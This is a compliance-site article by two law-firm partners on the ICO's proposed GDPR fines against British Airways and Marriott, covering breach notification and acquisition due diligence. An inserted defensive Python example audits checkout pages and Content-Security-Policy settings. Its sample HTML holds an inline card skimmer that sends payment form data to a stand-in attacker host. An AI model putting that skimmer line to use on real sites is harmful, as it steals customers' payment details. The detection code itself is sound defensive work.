Corporate Compliance Insights
ICO to Issue More Than $350M in Fines for GDPR Data Breaches

Record Fines for British Airways and Marriott

by Daniel Alvarez and Henrietta de Salis
August 20, 2019
in Data Privacy, Featured

In light of news of substantial fines from the U.K.’s ICO, Willkie Farr & Gallagher attorneys discuss the importance of safeguarding and understanding the personal data in a company’s possession – whether its own or acquired through corporate transactions.

In two statements released on consecutive days in July 2019, the U.K. Information Commissioner’s Office (ICO) announced its intention to fine both British Airways and Marriott International for infringements of the General Data Protection Regulation (GDPR) in connection with data breaches reported by those companies in 2018. The proposed fines would be the two largest penalties proposed against a company under the GDPR by any regulator to date. The ICO’s announcements follow the French data protection authority’s action earlier this year, in which it fined Google €50 million (approximately US$56 million) for violations of the GDPR related to transparency and consent. The ICO’s announcements and the accompanying fines highlight the importance of safeguarding and understanding the personal data in a company’s possession, whether its own or acquired through corporate transactions.

The ICO will consider representations from British Airways and Marriott, and from the data protection authorities of other EU member states, before taking its final decisions.

British Airways: A Record-Setting Fine

On July 8, 2019, the ICO announced that it intends to fine British Airways £183,390,000 (approximately US$230 million) for violations of the GDPR related to a cybersecurity incident in which malware on the airline’s website diverted user traffic to a fraudulent site, where attackers harvested customer details. The personal data (including credit card information) of approximately 500,000 customers was compromised in the incident. Following an extensive investigation, the ICO concluded that poor security arrangements at British Airways enabled the breach and justified the proposed penalty. The ICO noted that the airline has improved its security program since the incident, but that does not cure the original failure: the GDPR requires controllers to implement security measures appropriate to the risk (Article 32), to notify the supervisory authority within 72 hours of becoming aware of a breach unless the breach is unlikely to result in a risk to individuals (Article 33), and to notify the affected individuals where the breach is likely to result in a high risk to them (Article 34). The proposed fine is by far the highest under the GDPR to date, but it could have been higher: it equals 1.5 percent of the airline’s worldwide turnover for financial year 2017, whereas the GDPR permits penalties of up to 4 percent of worldwide annual turnover or €20 million, whichever is higher.
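The diversion the ICO describes, code on the airline’s own pages sending what customers type to a host the airline does not control, is the kind of change that a page-integrity check on the checkout flow can surface before a regulator does. The following is an added example, not code from this article, from British Airways or from the ICO: it audits a constructed checkout page for external scripts that come from hosts outside an allowlist or lack Subresource Integrity, flags inline scripts that reference unexpected hosts, and checks whether a Content-Security-Policy would have confined script loading and outbound connections to the same allowlists. The hostnames, allowlists, sample HTML and sample policies are all constructed for illustration.

```python
"""Added example: audit a checkout page for unvetted or injected scripts and
check that its Content-Security-Policy would confine script loading and
outbound connections. Hostnames, allowlists and samples are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlists for a payment page (assumed, not from the article).
ALLOWED_SCRIPT_HOSTS = {"www.example-airline.test", "cdn.example-airline.test"}
ALLOWED_CONNECT_HOSTS = {"api.example-airline.test"}

# Constructed sample: one vetted script, one without SRI, and an inline
# skimmer that beacons the payment form to a host the airline does not own.
SAMPLE_HTML = """<html><body>
<form id="payment"><input name="card"><input name="cvv"></form>
<script src="https://cdn.example-airline.test/app.js"
        integrity="sha384-PLACEHOLDERHASH"></script>
<script src="https://cdn.example-airline.test/modernizr.js"></script>
<script>
document.getElementById("payment").addEventListener("submit", function () {
  navigator.sendBeacon("https://collector.attacker.test/gate", new FormData(this));
});
</script>
</body></html>"""

# Constructed policies: one that permits anything, one pinned to the allowlists.
WEAK_CSP = "default-src 'self' *; script-src 'self' * 'unsafe-inline'"
STRICT_CSP = ("default-src 'self'; script-src 'self' cdn.example-airline.test; "
              "connect-src api.example-airline.test; form-action 'self'")


class _ScriptCollector(HTMLParser):
    """Collects external script tags (src, integrity) and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []   # (src, integrity attribute or None)
        self.inline = []     # source text of each inline <script>
        self._buf = None     # non-None while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], a.get("integrity")))
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def audit_scripts(html):
    """Return findings for scripts an attacker could have injected or tampered with."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src, integrity in parser.external:
        host = urlparse(src).hostname
        if host and host not in ALLOWED_SCRIPT_HOSTS:
            findings.append(f"script from unexpected host: {host}")
        if not integrity:
            # Without SRI the browser runs whatever the CDN serves, so a file
            # modified on an allowed host is not caught at load time.
            findings.append(f"script without SRI: {src}")
    for code in parser.inline:
        for host in re.findall(r"https?://([A-Za-z0-9.-]+)", code):
            if host not in ALLOWED_SCRIPT_HOSTS | ALLOWED_CONNECT_HOSTS:
                findings.append(f"inline script references unexpected host: {host}")
    return findings


def parse_csp(header):
    """Split a Content-Security-Policy header into {directive: [sources]}."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def audit_csp(header):
    """Check that script-src and connect-src are pinned to the allowlists.
    connect-src governs fetch/XHR/sendBeacon, the channel a skimmer uses to
    exfiltrate; script-src governs which code may run at all."""
    policy = parse_csp(header)
    findings = []
    for directive, allowed in (("script-src", ALLOWED_SCRIPT_HOSTS),
                               ("connect-src", ALLOWED_CONNECT_HOSTS)):
        sources = policy.get(directive, policy.get("default-src"))
        if sources is None:
            findings.append(f"{directive}: not set and no default-src fallback")
            continue
        if "*" in sources or "'unsafe-inline'" in sources:
            findings.append(f"{directive}: wildcard or 'unsafe-inline' permits injected code")
            continue
        stray = sorted(s for s in sources if not s.startswith("'") and s not in allowed)
        if stray:
            findings.append(f"{directive}: hosts outside allowlist: {', '.join(stray)}")
    return findings
```

Run against the constructed page, `audit_scripts` reports the Modernizr file served without an integrity hash and the inline handler that references a host outside both allowlists; `audit_csp` reports nothing for the strict policy and two wildcard findings for the weak one, because with `connect-src` falling back to a `default-src` of `*` the beacon to the attacker’s host would have been allowed. The point a practitioner should take from this is that the policy check and the page check complement each other: SRI catches a tampered file on an allowed host, while `connect-src` stops the data leaving even if a script does get in.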

British Airways, in a statement to investors by its parent company, IAG, said that it found no evidence of fraudulent activity on accounts linked to the incident and that it intends to vigorously defend itself against the proposed fine.

Marriott: Spotlight on Data Security in Due Diligence

The day after its British Airways announcement, the ICO announced its intention to fine Marriott International £99,200,396 (approximately US$124 million) in connection with a breach of the Starwood guest reservation database that exposed approximately 339 million guest records. Marriott discovered and disclosed the incident in November 2018, but the compromise of Starwood’s systems is believed to have begun in 2014, two years before Marriott acquired Starwood in 2016.

In its announcement of the proposed penalty, the ICO highlighted the importance of privacy and data security due diligence in deals to ensure compliance with the GDPR and asserted that Marriott had failed to undertake “sufficient due diligence” and “should have done more to secure its systems” when it acquired Starwood in 2016. The U.K. Information Commissioner Elizabeth Denham noted: “The GDPR makes it clear that organizations must be accountable for the personal data they hold. This can include carrying out proper due diligence when making a corporate acquisition and putting in place proper accountability measures to assess not only what personal data has been acquired, but also how it is protected.”

Moving Forward

For most companies, these announcements raise more questions than they answer. We will have to wait and see whether the ICO issues detailed findings and guidance on the specific points raised, such as what qualifies as “sufficient due diligence” in a corporate acquisition. The implication of the ICO’s statement on its Marriott investigation is that sufficient due diligence would have given Marriott the opportunity to put adequate security measures around customer data in place itself, or to require Starwood to do so. The ICO has noted that Marriott has improved its data security arrangements since the breach came to light.

In the meantime, these announcements confirm that regulators intend to use the significant fining authority the GDPR grants them, and the Marriott announcement in particular shows that buyers and sellers alike should treat privacy and data security as part of risk assessment in the M&A due diligence process, including what personal data is being acquired and how it is protected.

And while the ICO’s announcement addresses deals involving EU personal data subject to the GDPR, deals outside the GDPR’s scope also warrant careful review of privacy and data security, as the 2016 Yahoo/Verizon deal shows: Verizon negotiated $350 million off Yahoo’s purchase price after previously undisclosed security breaches came to light.


Tags: Data Breach, Due Diligence, GDPR, Mergers and Acquisitions

Daniel Alvarez and Henrietta de Salis

Daniel K. Alvarez is a partner in Willkie Farr & Gallagher’s Communications & Media Department in Washington. He is also a member of the Cybersecurity & Privacy Practice Group. Daniel brings an extensive background in technology and regulatory issues to counseling a broad range of clients in diverse industries on privacy and cybersecurity issues, including financial and health care privacy, regulation of marketing and advertising practices, international data transfer, children’s privacy and other privacy and cybersecurity matters regulated by the FTC, FCC, SEC and other state and federal agencies.
Henrietta de Salis is a U.K. partner in Willkie’s London office and a member of the Asset Management, Corporate & Financial Services, Structured Finance & Derivatives and Data Privacy & Security practice groups. Henrietta provides advice and transaction support to banks, securities firms, asset and investment managers, funds and intermediaries — including broker-dealers, custodians, trading platforms, private equity firms, wealth managers and insurers — on U.K. and European financial services legislation and compliance matters in both the wholesale and retail markets.
This article and others can be accessed through Willkie Compliance Concourse, a free, on-demand, web-based app providing access to practical guidance and the latest developments in regulatory compliance, investigations and enforcement, available at https://complianceconcourse.willkie.com.

© 2022 Corporate Compliance Insights